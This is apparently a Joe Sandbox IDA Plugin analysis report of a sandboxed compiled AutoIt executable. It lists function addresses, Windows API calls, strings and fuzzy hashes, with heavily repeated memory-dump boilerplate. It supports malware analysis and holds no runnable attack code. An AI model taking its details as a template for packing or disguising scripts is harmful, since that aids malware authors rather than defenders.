runas, xrefs: 0061D33A
%g, xrefs: 005E3C44

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%g
API String ID: 529118366-2073506830
Opcode ID: 5e9879ce73c9c133f82d38e2aebab08e6ae8effb0e180a4b39bb7c07a34294f0
Instruction ID: fa6d9bc08e1c05228a67a128ed49fe9fcd934e2b2eaae53894fdac82e2e48bdc
Opcode Fuzzy Hash: 5e9879ce73c9c133f82d38e2aebab08e6ae8effb0e180a4b39bb7c07a34294f0
Instruction Fuzzy Hash: 5B511631908189AECF04FBB5EC09AED7F7ABF8A700F145065F596A3162DA709B45CF20

Function 005E49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 005E49CD

Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06

GetCurrentProcess.KERNEL32(?,0066FAEC,00000000,00000000,?), ref: 005E4A9A
IsWow64Process.KERNEL32(00000000), ref: 005E4AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 005E4AE7
FreeLibrary.KERNEL32(00000000), ref: 005E4AF2
GetSystemInfo.KERNEL32(00000000), ref: 005E4B23
GetSystemInfo.KERNEL32(00000000), ref: 005E4B2F

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 566fd9f0d200d867985149dd3d31618bdf273d82acf642f45e56c71c86e35505
Instruction ID: 9244a7205347cacc188ededf8e79203d8b0009e74561a549b1159ac485cc0cf3
Opcode Fuzzy Hash: 566fd9f0d200d867985149dd3d31618bdf273d82acf642f45e56c71c86e35505
Instruction Fuzzy Hash: B491D2319897C0DECB35DB6994501EEFFF6BF2A310B484DAED0C693B41D220A548DB69

Function 005E4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005E4D8E,?,?,00000000,00000000), ref: 005E4E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005E4D8E,?,?,00000000,00000000), ref: 005E4EB0
LoadResource.KERNEL32(?,00000000,?,?,005E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,005E4E2F), ref: 0061D937
SizeofResource.KERNEL32(?,00000000,?,?,005E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,005E4E2F), ref: 0061D94C
LockResource.KERNEL32(005E4D8E,?,?,005E4D8E,?,?,00000000,00000000,?,?,?,?,?,?,005E4E2F,00000000), ref: 0061D95F

Strings

SCRIPT, xrefs: 005E4EA6

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 090975a71a934f2ebf42794d73f6f66cf6fa64ebc8e9b058efcece0c0c880479
Instruction ID: ddf54b23f9cc2f97b45be077eb67f52b871232bde91c42915661700b0cdf1383
Opcode Fuzzy Hash: 090975a71a934f2ebf42794d73f6f66cf6fa64ebc8e9b058efcece0c0c880479
Instruction Fuzzy Hash: EE115A75240740BFD7258BA6EC48F677BBEFBC5B11F20466CF446C6250DBA1EC008A61

Function 005EFCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

pbj, xrefs: 006249B9
%g, xrefs: 005EFCF3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: BuffCharUpper
String ID: pbj$%g
API String ID: 3964851224-782853035
Opcode ID: dfdf426f663028beb799aad90fbebc96fba272926affcc68f62c2e6751ed3611
Instruction ID: 24a536c09ecb6515bc49d0525c3050c77f4353d136e562bb756b0cdcfd1127fa
Opcode Fuzzy Hash: dfdf426f663028beb799aad90fbebc96fba272926affcc68f62c2e6751ed3611
Instruction Fuzzy Hash: B6928A706087518FD724DF14C484B6ABBE1BF85304F18896DE98A8B3A2DB75EC45CF92

Function 005EE6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Ddj, xrefs: 005EEABA
Ddj, xrefs: 005EEAC1
Ddj, xrefs: 00623B2E
Ddj, xrefs: 00623AF5
Variable must be of type 'Object'., xrefs: 00623E62

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID: Ddj$Ddj$Ddj$Ddj$Variable must be of type 'Object'.
API String ID: 0-4047433781
Opcode ID: cdca51a80809b3ce553f59718b4948fe6555a7280d8979673b14e98dd6bebe36
Instruction ID: 5c6f50b2d74179686d4ad9465dd98bc5765475352bcdb3093eeb1b466dd0137d
Opcode Fuzzy Hash: cdca51a80809b3ce553f59718b4948fe6555a7280d8979673b14e98dd6bebe36
Instruction Fuzzy Hash: C8A2BF74A10256CFCB28CF56C485AAEBBB2FF59310F248469E895AB351D734ED42CF90

Function 0064445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0061E398), ref: 0064446A
FindFirstFileW.KERNELBASE(?,?), ref: 0064447B
FindClose.KERNEL32(00000000), ref: 0064448B

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 8940aacbd75c98c13a689f94953061e4d3c708fddad7c3e46271f5ac3b3f5a43
Instruction ID: 2bc562da2dad52cbd0e49b1eb1ee844cb617ddcd90446533a3fb4279b749fab5
Opcode Fuzzy Hash: 8940aacbd75c98c13a689f94953061e4d3c708fddad7c3e46271f5ac3b3f5a43
Instruction Fuzzy Hash: 10E0D836410500A743106B78FC1E5E97B9EDF05335F100716F835C11D0EBF45D0099D5

Function 005F09D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005F0A5B
timeGetTime.WINMM ref: 005F0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005F0E53
Sleep.KERNEL32(0000000A), ref: 005F0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 005F0EFA
DestroyWindow.USER32 ref: 005F0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005F0F20
Sleep.KERNEL32(0000000A,?,?), ref: 00624E83
TranslateMessage.USER32(?), ref: 00625C60
DispatchMessageW.USER32(?), ref: 00625C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00625C82

Strings

pbj, xrefs: 006257B4
@GUI_CTRLID, xrefs: 00624F3A
@TRAY_ID, xrefs: 0062578F
@COM_EVENTOBJ, xrefs: 006254F0
@GUI_WINHANDLE, xrefs: 00624F8F
pbj, xrefs: 00624F59
@GUI_CTRLHANDLE, xrefs: 00624FE4
pbj, xrefs: 00625003
pbj, xrefs: 00624FAE

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbj$pbj$pbj$pbj
API String ID: 4212290369-1048033092
Opcode ID: ed407ec99f474f638ca84eae4428d1c09bdd0b2a7328cb1680f859ca2e532fe3
Instruction ID: 4fcce52d8fe880715290282c04d011b762f16554e32e9e2c2840c08c522e2a64
Opcode Fuzzy Hash: ed407ec99f474f638ca84eae4428d1c09bdd0b2a7328cb1680f859ca2e532fe3
Instruction Fuzzy Hash: 13B2C270608B52DFD728DF24D844BAABBE6BF84304F14491DF59A972A2CB74E845CF42

Function 00649155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00648F5F: __time64.LIBCMT ref: 00648F69

Part of subcall function 005E4EE5: _fseek.LIBCMT ref: 005E4EFD

__wsplitpath.LIBCMT ref: 00649234

Part of subcall function 006040FB: __wsplitpath_helper.LIBCMT ref: 0060413B

_wcscpy.LIBCMT ref: 00649247
_wcscat.LIBCMT ref: 0064925A
__wsplitpath.LIBCMT ref: 0064927F
_wcscat.LIBCMT ref: 00649295
_wcscat.LIBCMT ref: 006492A8

Part of subcall function 00648FA5: _memmove.LIBCMT ref: 00648FDE
Part of subcall function 00648FA5: _memmove.LIBCMT ref: 00648FED

_wcscmp.LIBCMT ref: 006491EF

Part of subcall function 00649734: _wcscmp.LIBCMT ref: 00649824
Part of subcall function 00649734: _wcscmp.LIBCMT ref: 00649837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00649452
_wcsncpy.LIBCMT ref: 006494C5
DeleteFileW.KERNEL32(?,?), ref: 006494FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00649511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00649522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00649534

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: ad5ca886aae35406dc83bda78223f29d849b0fec822082037fa2cf880f2a6b7b
Instruction ID: 1e2e45311d6203fd07595989de269cbcf7278736b3576905beccd78769b29d73
Opcode Fuzzy Hash: ad5ca886aae35406dc83bda78223f29d849b0fec822082037fa2cf880f2a6b7b
Instruction Fuzzy Hash: FFC14CB1D40219AADF25DF95CC85ADFBBBEEF85310F0040AAF609E7241DB709A448F65

Function 005E3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 005E3074
RegisterClassExW.USER32(00000030), ref: 005E309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005E30AF
InitCommonControlsEx.COMCTL32(?), ref: 005E30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005E30DC
LoadIconW.USER32(000000A9), ref: 005E30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005E3101

Strings

+, xrefs: 005E305D
TaskbarCreated, xrefs: 005E30A4
0, xrefs: 005E3056
AutoIt v3 GUI, xrefs: 005E3090

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: afd6f0482b0a1858f40554e5bff0b531e327625f8a9380896883fe77519d1d84
Instruction ID: 08b5a0df119ccc5a812be27ace4434a918a53995d7a03bd40d0022a4bff056f2
Opcode Fuzzy Hash: afd6f0482b0a1858f40554e5bff0b531e327625f8a9380896883fe77519d1d84
Instruction Fuzzy Hash: EF317671845348AFDB00DFA4EC89AD9BFF2FB0A310F14552EE581E62A1D3B91540CF50

Function 005E3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 005E3074
RegisterClassExW.USER32(00000030), ref: 005E309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005E30AF
InitCommonControlsEx.COMCTL32(?), ref: 005E30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005E30DC
LoadIconW.USER32(000000A9), ref: 005E30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005E3101

Strings

+, xrefs: 005E305D
TaskbarCreated, xrefs: 005E30A4
0, xrefs: 005E3056
AutoIt v3 GUI, xrefs: 005E3090

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: d0d5e4c2ed42a7c9a50f83a896f90a754227c7cdf4f35a31bc94c71c429eedf1
Instruction ID: 7159a87c3ca6ed29013dc3411f2b8708f5f5b8b5dc84bc4b357549f761c92765
Opcode Fuzzy Hash: d0d5e4c2ed42a7c9a50f83a896f90a754227c7cdf4f35a31bc94c71c429eedf1
Instruction Fuzzy Hash: 5C21C4B1911618AFDB00EFA4FC89B9DBFF6FB09700F00612AF912A62A0D7B555448F95

Function 005E708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005E4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006A52F8,?,005E37AE,?), ref: 005E4724

Part of subcall function 0060050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,005E7165), ref: 0060052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005E71A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0061E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0061E909
RegCloseKey.ADVAPI32(?), ref: 0061E947
_wcscat.LIBCMT ref: 0061E9A0

Strings

Include, xrefs: 0061E8BF, 0061E900
\Include\, xrefs: 005E7165
Software\AutoIt v3\AutoIt, xrefs: 005E719E
\, xrefs: 0061E9C3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 1e02150c8d24682f6c1c5d59afe2caff6a718b76f8d875dc66c45cf48a9fd15f
Instruction ID: 65b293137f562d9232012bc3271c7122ac6df35183a16e20b61a4b577c315ce5
Opcode Fuzzy Hash: 1e02150c8d24682f6c1c5d59afe2caff6a718b76f8d875dc66c45cf48a9fd15f
Instruction Fuzzy Hash: D071A3715083029EC308EF65EC45AABBBEAFF89310F44192EF495871A1DB71EA44CF51

Function 005E3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 005E36D2
KillTimer.USER32(?,00000001), ref: 005E36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005E371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005E372A
CreatePopupMenu.USER32 ref: 005E373E
PostQuitMessage.USER32(00000000), ref: 005E374D

Strings

TaskbarCreated, xrefs: 005E3725
%g, xrefs: 0061D081, 0061D0CF

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%g
API String ID: 129472671-2615855565
Opcode ID: 3d79c6aee2426e6ebfa7e23acc76c68a1c933acb507d9547991ff3a4393a973a
Instruction ID: 06d418116010040c422680c1adbe5a9f20eb96dfbedcf222a2686a29702b0f16
Opcode Fuzzy Hash: 3d79c6aee2426e6ebfa7e23acc76c68a1c933acb507d9547991ff3a4393a973a
Instruction Fuzzy Hash: FE4159B1200685FBDB1CAF75EC0DBB93F97FB45300F141524F583872A1DAA5AF409A65

Function 005E3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 005E3A50
LoadCursorW.USER32(00000000,00007F00), ref: 005E3A5F
LoadIconW.USER32(00000063), ref: 005E3A76
LoadIconW.USER32(000000A4), ref: 005E3A88
LoadIconW.USER32(000000A2), ref: 005E3A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005E3AC0
RegisterClassExW.USER32(?), ref: 005E3B16

Part of subcall function 005E3041: GetSysColorBrush.USER32(0000000F), ref: 005E3074
Part of subcall function 005E3041: RegisterClassExW.USER32(00000030), ref: 005E309E
Part of subcall function 005E3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005E30AF
Part of subcall function 005E3041: InitCommonControlsEx.COMCTL32(?), ref: 005E30CC
Part of subcall function 005E3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005E30DC
Part of subcall function 005E3041: LoadIconW.USER32(000000A9), ref: 005E30F2
Part of subcall function 005E3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005E3101

Strings

AutoIt v3, xrefs: 005E3B05
#, xrefs: 005E3AFB
0, xrefs: 005E3AF4

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 992fa7dd4683743f0ba279d21a54e23206e76a415e76db3b3fbc68653bd1e8bf
Instruction ID: 029b6334bb8beae629a52699905e189fe478522e6627ad68093ef20a8f533454
Opcode Fuzzy Hash: 992fa7dd4683743f0ba279d21a54e23206e76a415e76db3b3fbc68653bd1e8bf
Instruction Fuzzy Hash: 34213771D00308AFEB10EFA5FC09B9D7FB2FB09711F10112AF501A62A1D3B6A6409F84

Function 005E3766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/AutoIt3ExecuteLine, xrefs: 005E38A7
/AutoIt3OutputDebug, xrefs: 005E3892
Rj, xrefs: 0061D213
/ErrorStdOut, xrefs: 005E387D
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 005E37AE
CMDLINE, xrefs: 005E3822
CMDLINERAW, xrefs: 005E37FB
/AutoIt3ExecuteScript, xrefs: 005E38BC

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Rj
API String ID: 1825951767-951826378
Opcode ID: 2ecf881327f7d3648338e6dce92ddfe67e8d9da14803cf33ab96221f8d7b54a2
Instruction ID: 2e1a25f6b1a1b539c6cbabb81d5e6ad22f9ed989d0c1f256b43e8c91eb8f7ea2
Opcode Fuzzy Hash: 2ecf881327f7d3648338e6dce92ddfe67e8d9da14803cf33ab96221f8d7b54a2
Instruction Fuzzy Hash: 9CA15E7190425EAACF09EFA2DC59AFEBB79FF55300F440429F456A7191EF705A08CBA0

Function 005EF76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00600162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00600193
Part of subcall function 00600162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0060019B
Part of subcall function 00600162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006001A6
Part of subcall function 00600162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006001B1
